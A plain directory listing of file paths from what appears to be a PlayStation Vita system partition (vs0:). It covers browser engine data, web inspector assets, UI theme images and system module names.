vs0:data/external/webcore/data/icu/icudt40l/ibm-865_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-866_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-867_P100-1998.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-868_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-869_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-870_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-871_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-874_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-875_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-878_P100-1996.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-9005_X110-2007.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-901_P100-1999.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-902_P100-1999.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-9067_X100-2005.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-912_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-913_P100-2000.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-914_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-915_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-916_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-918_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-920_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-921_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-922_P100-1999.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-923_P100-1998.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-930_P120-1999.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-933_P110-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-935_P110-1999.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-937_P110-1999.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-939_P120-1999.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-942_P12A-1999.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-943_P130-1999.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-943_P15A-2003.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-9447_P100-2002.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-9448_X100-2005.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-9449_P100-2002.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-949_P110-1999.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-949_P11A-1999.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-950_P110-1999.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-954_P101-2007.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-964_P110-1999.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-970_P110_P110-2006_U2.cnv
vs0:data/external/webcore/data/icu/icudt40l/ibm-971_P100-1995.cnv
vs0:data/external/webcore/data/icu/icudt40l/icu-internal-25546.cnv
vs0:data/external/webcore/data/icu/icudt40l/invuca.icu
vs0:data/external/webcore/data/icu/icudt40l/iso-8859_10-1998.cnv
vs0:data/external/webcore/data/icu/icudt40l/iso-8859_11-2001.cnv
vs0:data/external/webcore/data/icu/icudt40l/iso-8859_14-1998.cnv
vs0:data/external/webcore/data/icu/icudt40l/iso-ir-165.cnv
vs0:data/external/webcore/data/icu/icudt40l/jisx-212.cnv
vs0:data/external/webcore/data/icu/icudt40l/lmb-excp.cnv
vs0:data/external/webcore/data/icu/icudt40l/macos-0_2-10.2.cnv
vs0:data/external/webcore/data/icu/icudt40l/macos-29-10.2.cnv
vs0:data/external/webcore/data/icu/icudt40l/macos-35-10.2.cnv
vs0:data/external/webcore/data/icu/icudt40l/macos-6_2-10.4.cnv
vs0:data/external/webcore/data/icu/icudt40l/macos-7_3-10.2.cnv
vs0:data/external/webcore/data/icu/icudt40l/pnames.icu
vs0:data/external/webcore/data/icu/icudt40l/ucadata.icu
vs0:data/external/webcore/data/icu/icudt40l/uidna.spp
vs0:data/external/webcore/data/icu/icudt40l/windows-874-2000.cnv
vs0:data/external/webcore/data/icu/icudt40l/windows-936-2000.cnv
vs0:data/external/webcore/data/icu/icudt40l/windows-949-2000.cnv
vs0:data/external/webcore/data/icu/icudt40l/windows-950-2000.cnv
vs0:data/external/webcore/data/webcoreapp.bin
vs0:data/external/webcore/etc/fontinfo-Hydra.xml
vs0:data/external/webcore/etc/html.css
vs0:data/external/webcore/etc/quirk.css
vs0:data/external/webcore/jx_web_filtering.suprx
vs0:data/external/webcore/lib/Plugins
vs0:data/external/webcore/mapview/image/bg/map_background.png
vs0:data/external/webcore/mapview/image/bookmark/Map_Bookmark.png
vs0:data/external/webcore/mapview/image/bookmark/Map_Bookmark_shadow.png
vs0:data/external/webcore/mapview/image/direction/Map_corn_circle.png
vs0:data/external/webcore/mapview/image/flags/Dummy.png
vs0:data/external/webcore/mapview/image/flags/Map_Circle_Purple.png
vs0:data/external/webcore/mapview/image/flags/Map_Flag_Purple.png
vs0:data/external/webcore/mapview/image/flags/Map_Flag_goal.png
vs0:data/external/webcore/mapview/image/flags/Map_Flag_red.png
vs0:data/external/webcore/mapview/image/flags/Map_Flag_shadow.png
vs0:data/external/webcore/mapview/image/flags/Map_Flag_shadow_square.png
vs0:data/external/webcore/mapview/image/flags/Map_Flag_start.png
vs0:data/external/webcore/mapview/image/flags/Select_Circle_Red_circle.png
vs0:data/external/webcore/mapview/image/navigation/Map_Mode_compass.png
vs0:data/external/webcore/mapview/image/navigation/Map_location_circle.png
vs0:data/external/webcore/mapview/libjs/default.css
vs0:data/external/webcore/mapview/libjs/google_maps_adapter_lib_version_0_1.js
vs0:data/external/webcore/mapview/libjs/google_maps_version_3_0.js
vs0:data/external/webcore/mapview/libjs/main.js
vs0:data/external/webcore/mapview/libjs/standard.css
vs0:data/external/webcore/mapview/loadmapview.htm
vs0:data/external/webcore/remote-web-inspector/css/inspectorManx.css
vs0:data/external/webcore/remote-web-inspector/css/remote-web-inspector.css
vs0:data/external/webcore/remote-web-inspector/external/inspector/Inspector.json
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/AuditsPanel.js
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/CodeMirrorTextEditor.js
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/ElementsPanel.js
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/addIcon.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/applicationCache.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/back.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/breakpointBorder.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/breakpointConditionalBorder.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/breakpointConditionalCounterBorder.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/breakpointCounterBorder.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/checker.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/closeButtons.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/cookie.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/database.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/databaseTable.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/debuggerContinue.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/debuggerPause.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/debuggerStepInto.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/debuggerStepOut.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/debuggerStepOver.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/deleteIcon.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/disclosureTriangleSmallDown.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/disclosureTriangleSmallDownBlack.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/disclosureTriangleSmallDownWhite.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/disclosureTriangleSmallRight.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/disclosureTriangleSmallRightBlack.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/disclosureTriangleSmallRightDown.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/disclosureTriangleSmallRightDownBlack.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/disclosureTriangleSmallRightDownWhite.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/disclosureTriangleSmallRightWhite.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/domain.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/errorIcon.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/errorMediumIcon.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/errorRedDot.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/fileSystem.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/forward.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/frame.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/glossyHeader.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/glossyHeaderPressed.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/glossyHeaderSelected.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/glossyHeaderSelectedPressed.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/goArrow.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/graphLabelCalloutLeft.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/graphLabelCalloutRight.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/indexedDB.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/indexedDBIndex.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/indexedDBObjectStore.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/localStorage.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/namedFlowOverflow.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/navigatorShowHideButton.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/paneAddButtons.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/paneBottomGrow.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/paneBottomGrowActive.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/paneElementStateButtons.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/paneFilterButtons.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/paneGrowHandleLine.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/paneRefreshButtons.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/paneSettingsButtons.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/popoverArrows.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/popoverBackground.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/profileGroupIcon.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/profileIcon.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/profileSmallIcon.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/profilesSilhouette.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/programCounterBorder.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/radioDot.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/regionEmpty.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/regionFit.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/regionOverset.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/resourceCSSIcon.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/resourceDocumentIcon.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/resourceDocumentIconSmall.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/resourceJSIcon.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/resourcePlainIcon.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/resourcePlainIconSmall.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/resourcesSizeGraphIcon.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/resourcesTimeGraphIcon.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/scriptsSilhouette.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/searchNext.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/searchPrev.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/searchSmallBlue.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/searchSmallBrightBlue.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/searchSmallGray.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/searchSmallWhite.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/segment.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/segmentEnd.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/segmentHover.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/segmentHoverEnd.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/segmentSelected.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/segmentSelectedEnd.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/sessionStorage.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/spinner.gif
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/spinnerActive.gif
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/spinnerActiveSelected.gif
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/spinnerInactive.gif
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/spinnerInactiveSelected.gif
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/splitviewDimple.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/splitviewDividerBackground.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/statusbarButtonGlyphs.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/statusbarButtonGlyphs2x.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/statusbarResizerHorizontal.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/statusbarResizerVertical.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/successGreenDot.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/thumbActiveHoriz.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/thumbActiveVert.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/thumbHoriz.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/thumbHoverHoriz.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/thumbHoverVert.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/thumbVert.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/tickMark.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/timelineHollowPillBlue.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/timelineHollowPillGray.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/timelineHollowPillGreen.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/timelineHollowPillOrange.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/timelineHollowPillPurple.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/timelineHollowPillRed.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/timelineHollowPillYellow.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/timelinePillBlue.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/timelinePillGray.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/timelinePillGreen.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/timelinePillOrange.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/timelinePillPurple.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/timelinePillRed.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/timelinePillYellow.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/toolbarIcons.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/toolbarIconsSmall.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/toolbarItemSelected.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/trackHoriz.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/trackVert.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/treeDownTriangleBlack.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/treeDownTriangleWhite.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/treeRightTriangleBlack.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/treeRightTriangleWhite.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/treeUpTriangleBlack.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/treeUpTriangleWhite.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/userInputIcon.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/userInputPreviousIcon.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/userInputResultIcon.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/warningIcon.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/warningMediumIcon.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/warningOrangeDot.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/Images/warningsErrors.png
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/NetworkPanel.js
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/ProfilesPanel.js
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/ResourcesPanel.js
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/ScriptFormatterWorker.js
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/ScriptsPanel.js
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/TimelinePanel.js
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/UglifyJS/parse-js.js
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/auditsPanel.css
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/breadcrumbList.css
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/breakpointsList.css
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/canvasProfiler.css
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/cm/LICENSE
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/cm/closebrackets.js
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/cm/cmdevtools.css
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/cm/codemirror.css
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/cm/codemirror.js
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/cm/css.js
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/cm/htmlmixed.js
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/cm/javascript.js
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/cm/matchbrackets.js
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/cm/xml.js
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/cssNamedFlows.css
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/dataGrid.css
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/dialog.css
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/elementsPanel.css
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/filteredItemSelectionDialog.css
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/flameChart.css
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/heapProfiler.css
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/helpScreen.css
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/indexedDBViews.css
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/inspector.css
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/inspector.html
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/inspector.js
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/inspectorCommon.css
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/inspectorSyntaxHighlight.css
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/navigatorView.css
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/networkLogView.css
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/networkPanel.css
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/panelEnablerView.css
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/popover.css
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/profilesPanel.css
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/resourceView.css
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/resourcesPanel.css
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/revisionHistory.css
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/scriptsPanel.css
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/sidebarPane.css
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/spectrum.css
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/splitView.css
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/tabbedPane.css
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/textEditor.css
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/textPrompt.css
vs0:data/external/webcore/remote-web-inspector/external/inspector/front-end/timelinePanel.css
vs0:data/external/webcore/remote-web-inspector/externald
vs0:data/external/webcore/remote-web-inspector/header.png
vs0:data/external/webcore/remote-web-inspector/inspector.html
vs0:data/external/webcore/remote-web-inspector/js/ExtensionAdapter.js
vs0:data/external/webcore/remote-web-inspector/js/Path.js
vs0:data/external/webcore/remote-web-inspector/js/RemoteWebInspector.js
vs0:data/external/webcore/remote-web-inspector/js/externs.js
vs0:data/external/webcore/silk.suprx
vs0:data/external/webcore/silk_base.suprx
vs0:data/external/webcore/silk_mrcommon.suprx
vs0:data/external/webcore/silk_mrserver.suprx
vs0:data/external/webcore/silk_webkit.suprx
vs0:data/external/webcore/theme/button/button_focus.png
vs0:data/external/webcore/theme/button/button_hover.png
vs0:data/external/webcore/theme/button/button_normal.png
vs0:data/external/webcore/theme/button/button_press.png
vs0:data/external/webcore/theme/checkbox/checkbox_off_focus.png
vs0:data/external/webcore/theme/checkbox/checkbox_off_hover.png
vs0:data/external/webcore/theme/checkbox/checkbox_off_normal.png
vs0:data/external/webcore/theme/checkbox/checkbox_on_focus.png
vs0:data/external/webcore/theme/checkbox/checkbox_on_hover.png
vs0:data/external/webcore/theme/checkbox/checkbox_on_normal.png
vs0:data/external/webcore/theme/menulist/menulist_focus.png
vs0:data/external/webcore/theme/menulist/menulist_hover.png
vs0:data/external/webcore/theme/menulist/menulist_normal.png
vs0:data/external/webcore/theme/menulist/menulist_press.png
vs0:data/external/webcore/theme/mouse/mouse_cursor_hover.png
vs0:data/external/webcore/theme/mouse/mouse_cursor_hover2.png
vs0:data/external/webcore/theme/mouse/mouse_cursor_input.png
vs0:data/external/webcore/theme/mouse/mouse_cursor_normal.png
vs0:data/external/webcore/theme/popupmenu/popupmenu_background.png
vs0:data/external/webcore/theme/popupmenu/popupmenu_highlight.png
vs0:data/external/webcore/theme/radio/radio_off_focus.png
vs0:data/external/webcore/theme/radio/radio_off_hover.png
vs0:data/external/webcore/theme/radio/radio_off_normal.png
vs0:data/external/webcore/theme/radio/radio_on_focus.png
vs0:data/external/webcore/theme/radio/radio_on_hover.png
vs0:data/external/webcore/theme/radio/radio_on_normal.png
vs0:data/external/webcore/theme/scrollbar/scrollbar_background.png
vs0:data/external/webcore/theme/scrollbar/scrollbar_button_hover.png
vs0:data/external/webcore/theme/scrollbar/scrollbar_button_normal.png
vs0:data/external/webcore/theme/scrollbar/scrollbar_button_press.png
vs0:data/external/webcore/theme/scrollbar/scrollbar_down_button_hover.png
vs0:data/external/webcore/theme/scrollbar/scrollbar_down_button_normal.png
vs0:data/external/webcore/theme/scrollbar/scrollbar_down_button_press.png
vs0:data/external/webcore/theme/scrollbar/scrollbar_up_button_hover.png
vs0:data/external/webcore/theme/scrollbar/scrollbar_up_button_normal.png
vs0:data/external/webcore/theme/scrollbar/scrollbar_up_button_press.png
vs0:data/external/webcore/vita_jsextobj.suprx
vs0:data/external/webcore/webcore.suprx
vs0:data/external/webcore/webcore_server.suprx
vs0:data/external/widget
vs0:data/internal/bgm/shell
vs0:data/internal/effects/earth/psets
vs0:data/internal/effects/earth/textures/earth_spec_01.dds
vs0:data/internal/effects/earth/textures/rainbow.dds
vs0:data/internal/effects/page_turn/psets
vs0:data/internal/effects/page_turn/textures/page_corner.dds
vs0:data/internal/effects/panel/psets
vs0:data/internal/effects/particles/pattern1/psets
vs0:data/internal/effects/particles/pattern2/psets
vs0:data/internal/effects/particles/textures/palette.dds
vs0:data/internal/effects/particles/textures/proc_iridescent.dds
vs0:data/internal/effects/wave/psets
vs0:data/internal/icon/parental_lock.png
vs0:data/internal/icon/power.png
vs0:data/internal/keylock/keylock.png
vs0:data/internal/launch/list_launch_emu.dat
vs0:data/internal/launch/list_launch_teleport.dat
vs0:data/internal/launch/list_launch_vita.dat
vs0:data/internal/launch/version_launch.dat
vs0:data/internal/livearea/default/sce_sys/icon0.png
vs0:data/internal/livearea/default/sce_sys/livearea/contents/bg0.png
vs0:data/internal/livearea/default/sce_sys/livearea/contents/template.xml
vs0:data/internal/livearea/safebg.png
vs0:data/internal/theme/defaultTheme_homeScreen.png
vs0:data/internal/theme/defaultTheme_startScreen.png
vs0:data/internal/theme/theme_defaultImage.png
vs0:sys/external/activity_db.suprx
vs0:sys/external/adhoc_matching.suprx
vs0:sys/external/apputil.suprx
vs0:sys/external/apputil_ext.suprx
vs0:sys/external/audiocodec.suprx
vs0:sys/external/avcdec_for_player.suprx
vs0:sys/external/bXCe.suprx
vs0:sys/external/bgapputil.suprx
vs0:sys/external/common_gui_dialog.suprx
vs0:sys/external/dbrecovery_utility.suprx
vs0:sys/external/dbutil.suprx
vs0:sys/external/friend_select.suprx
vs0:sys/external/incoming_dialog.suprx
vs0:sys/external/ini_file_processor.suprx
vs0:sys/external/libSceBeisobmf.suprx
vs0:sys/external/libSceBemp2sys.suprx
vs0:sys/external/libSceCompanionUtil.suprx
vs0:sys/external/libSceDtcpIp.suprx
vs0:sys/external/libSceFt2.suprx
vs0:sys/external/libSceJson.suprx
vs0:sys/external/libSceMp4Rec.suprx
vs0:sys/external/libSceMusicExport.suprx
vs0:sys/external/libSceNearDialogUtil.suprx
vs0:sys/external/libSceNearUtil.suprx
vs0:sys/external/libScePhotoExport.suprx
vs0:sys/external/libScePromoterUtil.suprx
vs0:sys/external/libSceScreenShot.suprx
vs0:sys/external/libSceShutterSound.suprx
vs0:sys/external/libSceSqlite.suprx
vs0:sys/external/libSceTelephonyUtil.suprx
vs0:sys/external/libSceTeleportClient.suprx
vs0:sys/external/libSceTeleportServer.suprx
vs0:sys/external/libSceVideoExport.suprx
vs0:sys/external/libSceVideoSearchEmpr.suprx
vs0:sys/external/libSceXml.suprx
vs0:sys/external/libatrac.suprx
vs0:sys/external/libc.suprx
vs0:sys/external/libcdlg.suprx
vs0:sys/external/libcdlg_calendar_review.suprx
vs0:sys/external/libcdlg_cameraimport.suprx
vs0:sys/external/libcdlg_checkout.suprx
vs0:sys/external/libcdlg_companion.suprx
vs0:sys/external/libcdlg_compat.suprx
vs0:sys/external/libcdlg_cross_controller.suprx
vs0:sys/external/libcdlg_friendlist.suprx
vs0:sys/external/libcdlg_friendlist2.suprx
vs0:sys/external/libcdlg_game_custom_data.suprx
vs0:sys/external/libcdlg_game_custom_data_impl.suprx
vs0:sys/external/libcdlg_ime.suprx
vs0:sys/external/libcdlg_invitation.suprx
